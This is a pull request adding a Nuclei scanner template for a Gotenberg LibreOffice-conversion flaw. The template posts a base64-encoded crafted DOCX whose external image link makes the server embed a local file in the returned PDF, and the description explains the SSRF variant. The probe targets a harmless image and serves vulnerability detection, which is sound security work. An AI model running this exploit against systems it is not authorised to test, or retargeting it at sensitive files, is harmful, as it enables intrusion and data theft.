### PR TITLE
Add CVE-2026-55229 template

### DIFF
--- a/http/cves/2026/CVE-2026-55229.yaml
+++ b/http/cves/2026/CVE-2026-55229.yaml
@@ -1,21 +1,11 @@
 id: CVE-2026-55229
 
 info:
-  name: Gotenberg <8.34.0 - SSRF / Local File Disclosure via LibreOffice Conversion
+  name: Gotenberg < 8.34.0 - Local File Disclosure
   author: str4k3r
   severity: high
   description: |
-    Gotenberg's /forms/libreoffice/convert endpoint passes uploaded documents
-    straight to LibreOffice for conversion with no restriction on external
-    resource loading. A DOCX whose document.xml links an image via an
-    OOXML "External" relationship (a:blip r:link, TargetMode="External")
-    causes LibreOffice to resolve and load that target during conversion.
-    When the target is a local filesystem path, LibreOffice reads the file
-    and embeds it as an image XObject in the output PDF, producing a
-    local-file-disclosure primitive limited to files LibreOffice can decode
-    as an image; when the target is an attacker-controlled URL, Gotenberg's
-    host issues the outbound request (SSRF). Version 8.34.0 blocks external
-    resource resolution during document conversion.
+    Gotenberg before 8.34.0 allows SSRF and limited local file disclosure via its /forms/libreoffice/convert endpoint. When LibreOffice is used to convert user-uploaded DOCX files, external relationships within the document (such as a:blip r:link TargetMode="External") can instruct LibreOffice to fetch local resources (file://) or remote resources (http/https), which are then included as images in the generated PDF. This can disclose the contents of local files LibreOffice can open as images, or allow outbound requests to attacker-controlled endpoints. Version 8.34.0 disables resolution of external resources during document conversion to mitigate the vulnerability.
   reference:
     - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-2mrg-35hw-x3x9
     - https://github.com/gotenberg/gotenberg/releases/tag/v8.34.0
@@ -30,24 +20,29 @@ info:
     max-request: 1
     product: gotenberg
     vendor: gotenberg
-  tags: cve,cve2026,gotenberg,ssrf,lfi,unauth
+    shodan-query: "Gotenberg"
+    fofa-query: "Gotenberg"
+  tags: cve,cve2026,gotenberg,ssrf,lfi
 
 http:
   - raw:
       - |
         POST /forms/libreoffice/convert HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=nucleiforgeboundary
+        Content-Type: multipart/form-data; boundary=testforgeboundary
 
-        --nucleiforgeboundary
+        --testforgeboundary
         Content-Disposition: form-data; name="files"; filename="poc.docx"
         Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
 
         {{base64_decode("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")}}
-        --nucleiforgeboundary--
+        --testforgeboundary--
 
     matchers:
-      - type: word
-        part: body
-        words:
-          - "/Subtype/Image"
+      - type: dsl
+        dsl:
+          - 'contains(content_disposition, "attachment; filename=")'
+          - 'contains(content_type, "application/pdf")'
+          - 'contains(body, "/Subtype/Image")'
+          - 'status_code == 200'
+        condition: and

--- a/http/cves/2026/CVE-2026-55229.yaml
+++ b/http/cves/2026/CVE-2026-55229.yaml
@@ -1,0 +1,53 @@
+id: CVE-2026-55229
+
+info:
+  name: Gotenberg <8.34.0 - SSRF / Local File Disclosure via LibreOffice Conversion
+  author: str4k3r
+  severity: high
+  description: |
+    Gotenberg's /forms/libreoffice/convert endpoint passes uploaded documents
+    straight to LibreOffice for conversion with no restriction on external
+    resource loading. A DOCX whose document.xml links an image via an
+    OOXML "External" relationship (a:blip r:link, TargetMode="External")
+    causes LibreOffice to resolve and load that target during conversion.
+    When the target is a local filesystem path, LibreOffice reads the file
+    and embeds it as an image XObject in the output PDF, producing a
+    local-file-disclosure primitive limited to files LibreOffice can decode
+    as an image; when the target is an attacker-controlled URL, Gotenberg's
+    host issues the outbound request (SSRF). Version 8.34.0 blocks external
+    resource resolution during document conversion.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-2mrg-35hw-x3x9
+    - https://github.com/gotenberg/gotenberg/releases/tag/v8.34.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-55229
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-55229
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    max-request: 1
+    product: gotenberg
+    vendor: gotenberg
+  tags: cve,cve2026,gotenberg,ssrf,lfi,unauth
+
+http:
+  - raw:
+      - |
+        POST /forms/libreoffice/convert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=nucleiforgeboundary
+
+        --nucleiforgeboundary
+        Content-Disposition: form-data; name="files"; filename="poc.docx"
+        Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
+
+        {{base64_decode("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")}}
+        --nucleiforgeboundary--
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/Subtype/Image"


### PR DESCRIPTION
Adds a Nuclei template for **CVE-2026-55229**, an unauthenticated SSRF / local file disclosure in Gotenberg <8.34.0 (fixed in 8.34.0, GHSA-2mrg-35hw-x3x9).

The `/forms/libreoffice/convert` endpoint passes uploaded documents straight to LibreOffice for conversion with no restriction on external resource loading. A DOCX whose `document.xml` links an image via an OOXML "External" relationship (`a:blip r:link`, `TargetMode="External"`) causes LibreOffice to resolve and load that target during conversion. When the target is a local filesystem path, LibreOffice reads the file and embeds it as an image XObject in the output PDF; when the target is an attacker-controlled URL, Gotenberg's host issues the outbound request (SSRF).

The template uploads a crafted DOCX linking `/usr/share/pixmaps/debian-logo.png` and checks the returned PDF for an embedded `/Subtype/Image` object — present on a vulnerable instance, absent once the fix blocks external resource resolution.

Verified against the official pinned image tags (8.33 vulnerable / 8.34.0 fixed) on default configuration with no auth and no extra setup.